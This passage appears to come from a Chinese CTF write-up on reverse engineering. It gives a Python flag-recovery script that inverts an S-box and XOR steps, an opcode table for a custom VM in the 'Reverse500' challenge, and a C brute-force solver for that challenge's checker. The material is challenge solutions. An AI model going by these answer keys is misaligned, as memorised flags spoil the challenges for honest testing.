sbox = [1, 3, 8, -55, 21, 27, 35, 67, -14, -111, -49, 89, 92, 109, 31, -112, 7, -74, 55, -15, -32, -1, -20, 83, 39, -103, -36, -116, -93, -50, -19, -128, 96, 46, 99, 26, -86, -46, -34, 105, -21, 0, -88, 68, 16, -42, 94, 5, 120, -53, -2, -109, 11, -121, -62, -6, 29, 112, -82, -79, -71, -37, 52, 119, 102, 60, 111, 87, -3, 41, -114, -43, 49, -118, 54, 44, -7, 100, 98, -16, 78, 116, 91, 23, 97, -58, -23, -75, -97, -81, 76, 6, 61, -119, 124, -54, 79, 57, 50, -113, 84, -107, 86, 4, -108, 40, -87, 34, -102, -18, -115, -57, -85, -77, 118, 103, 53, -98, -96, 37, -72, 2, -80, -35, -92, 122, -83, 18, -60, -68, 14, -64, 115, 108, 63, 81, 114, -69, 117, -39, -33, 36, -89, 125, 59, 65, -99, 101, 93, -105, 38, 43, 126, -126, 30, 75, 77, -45, 13, -76, -61, 104, 51, 85, 64, 127, -65, -48, 74, 123, -117, -95, -9, 33, 80, 56, -91, -26, -31, -73, 69, 48, -8, -22, -104, 113, -100, -38, -101, -4, -27, -17, -29, 17, 82, -25, -51, -127, -110, -122, 28, 12, -66, 66, -78, -24, -56, -11, 110, 107, 15, -84, -13, -125, -94, 121, 70, -12, 20, 106, -124, 71, 25, -120, -44, -10, 47, -106, 45, 95, 73, 32, 62, -90, -41, 58, 24, 19, -67, -123, 72, -28, 42, 10, -40, 90, -47, 22, -5, -30, -52, -59, -63, 9, -70, 88]
for i in xrange(len(sbox)):
sbox[i] = u8(sbox[i])
length = 0x17
for i in xrange(23):
result[i] = u8(result[i])
# step1
for i in xrange(23):
if i % 2 == 0:
result[i] = u8(result[i]-1)
else:
result[i] = u8(result[i]+1)
for i in xrange(23):
result[i] = u8(result[i] ^ 0x82)
for i in xrange(23):
result[i] = u8(result[i] -4)
t = []
for i in xrange(23):
t.append(sbox.index(result[i]))
xor_seed = [58, 50, 42, 34, 26, 18, 10, 2, 60, 52, 44, 36, 28, 20, 12, 4, 62, 54, 46, 38, 30, 22, 14, 6, 64, 56, 48, 40, 32, 24, 16, 8, 57, 49, 41, 33, 25, 17, 9, 1, 59, 51, 43, 35, 27, 19, 11, 3, 61, 53, 45, 37, 29, 21, 13, 5, 63, 55, 47, 39, 31, 23, 15, 7]
for i in xrange(23):
t[i] = u8(t[i] ^ xor_seed[i])
print ''.join([chr(c) for c in t])
Reverse500(500)
这是一个64位VM的题,checker是main函数,mod1、mod2和mod3是三个子函数,先是加载程序,然后分配寄存器和栈的空间
下面是指令对应的操作
80mov reg, immediate
81xor reg1, reg2 | xor reg1, immediate
82 push reg
83pop reg
9Aje
9Bjmp
9Cjne
9Dcall
A5mov reg1, reg2+reg3
A6 mov reg1, [reg2]
A7mov reg1, cs+[cs+0x20]+immediate
B0mov [reg1], byte ptr [reg2]
B1mov reg1, [reg2] & immediate
B2mov reg1, [reg2] | immediate
B3mov reg1, [reg2] / immediate
C5cmp
C6ret
C7mov reg1, reg2
E0syscall
E1malloc
第一个子函数mod1是输入,然后在checker也就是main函数验证输入的长度是不是0x1D,通过后调用mod3函数对输入做了三次处理,先是以输入值的每个字符为索引到mod3_base_addr+0x600的位置查表替换,然后再跟mod3_base_addr+0x700处的四个值循环异或,之后把结果中每个值的高4位除以0x10之后再或0x30,低4位或0x30,最后与mod3_base_addr+0x730处的值比较,得到flag代码如下
#include <stdio.h>
#include <stdio.h>
int main() {
unsigned char table[256] = {
0x49, 0xB6, 0x2C, 0x2D, 0xAB, 0x8F, 0x36, 0x11, 0x32, 0xE7, 0x73, 0xF8,
0xF9, 0x4C, 0x26, 0xA3, 0x5B, 0xBB, 0xBC, 0xBD, 0xBE, 0x98, 0x99, 0x97,
0x9A, 0x9F, 0xA0, 0xDD, 0xE0, 0x74, 0x8A, 0x8B, 0x8C, 0xDE, 0xDF, 0x08,
0x62, 0xE5, 0xF1, 0xDB, 0x23, 0xF7, 0xA4, 0xCC, 0xCD, 0xC9, 0xC4, 0x75,
0xD6, 0xD3, 0x0C, 0x0D, 0x91, 0x1D, 0x1E, 0x0B, 0x14, 0xB2, 0x66, 0x67,
0x9D, 0x30, 0xEE, 0x53, 0x6B, 0x05, 0x6F, 0x70, 0x71, 0x76, 0x93, 0xEF,
0xF0, 0x51, 0x52, 0xC3, 0x58, 0xFA, 0xD8, 0x5F, 0x79, 0x7A, 0x7B, 0x7C,
0x7D, 0x7E, 0x7F, 0x00, 0x80, 0x0E, 0x0F, 0x10, 0xEC, 0xED, 0x35, 0x13,
0x21, 0xA2, 0x65, 0xB7, 0x4A, 0x57, 0xB5, 0x6D, 0x5C, 0x89, 0x5E, 0xAE,
0xAF, 0xB0, 0x12, 0xD5, 0x72, 0xC6, 0xD7, 0xE1, 0xA5, 0x46, 0x15, 0x16,
0x44, 0x43, 0xB4, 0x60, 0xE4, 0xC7, 0xC8, 0xBF, 0x85, 0x87, 0x09, 0x0A,
0x86, 0xC1, 0xAA, 0xC5, 0xC2, 0xD9, 0xDA, 0x94, 0x95, 0xD2, 0xFB, 0x1A,
0xFC, 0x19, 0x1B, 0xCB, 0x61, 0xE3, 0xCE, 0xCF, 0xD0, 0x3C, 0xF4, 0xF5,
0xE6, 0xD4, 0x68, 0x56, 0xAD, 0xCA, 0xD1, 0x96, 0x90, 0xB1, 0x22, 0xE8,
0xA6, 0x69, 0x83, 0x84, 0x31, 0xE9, 0x2A, 0x9E, 0xE2, 0x6A, 0x37, 0x2B,
0x33, 0x20, 0xAC, 0x54, 0x42, 0x45, 0x34, 0x81, 0x82, 0xEA, 0xEB, 0x38,
0x2E, 0x2F, 0x5A, 0x4E, 0x4F, 0x50, 0x1F, 0x8E, 0xF2, 0xF3, 0x3A, 0x3B,
0x07, 0x63, 0x5D, 0x9B, 0x24, 0x02, 0x04, 0x47, 0xB8, 0xB9, 0xBA, 0x6C,
0x48, 0x25, 0xC0, 0x92, 0x4B, 0x59, 0x77, 0x78, 0x4D, 0xA1, 0x39, 0x3D,
0x3E, 0x3F, 0x40, 0x41, 0x55, 0xB3, 0x01, 0xFD, 0xFE, 0xFF, 0x06, 0x03,
0x17, 0x18, 0xF6, 0x9C, 0x88, 0x64, 0x6E, 0x29, 0x8D, 0xDC, 0xA7, 0xA8,
0xA9, 0x27, 0x28, 0x1C
};
unsigned char final[58] = {
0x3D, 0x38, 0x31, 0x36, 0x30, 0x34, 0x31, 0x33, 0x3C, 0x34, 0x31, 0x3A,
0x37, 0x34, 0x3F, 0x30, 0x37, 0x33, 0x33, 0x31, 0x36, 0x34, 0x39, 0x33,
0x3F, 0x3C, 0x30, 0x3D, 0x36, 0x3B, 0x3E, 0x3D, 0x3E, 0x32, 0x36, 0x33,
0x31, 0x34, 0x38, 0x3D, 0x3B, 0x37, 0x3F, 0x37, 0x36, 0x3D, 0x39, 0x3E,
0x3A, 0x3F, 0x37, 0x35, 0x3A, 0x37, 0x35, 0x3E, 0x36, 0x33
};
unsigned char xor[4] = {
0xA4, 0x66, 0x79, 0x80
};
for (int j = 0; j < 29; j++) {
unsigned char i;
for (i = 32; i < 127; i++) {
unsigned char key = table[i] ^ xor[j % 4];
unsigned char high = ((key & 0xF0) / 0x10) | 0x30;
unsigned char low = (key & 0x0F) | 0x30;
if (high == final[j * 2] && low == final[j * 2 + 1]) {
printf("%c", i);
}
}
}
printf("n");
return 0;
}
发表评论
您还未登录,请先登录。
登录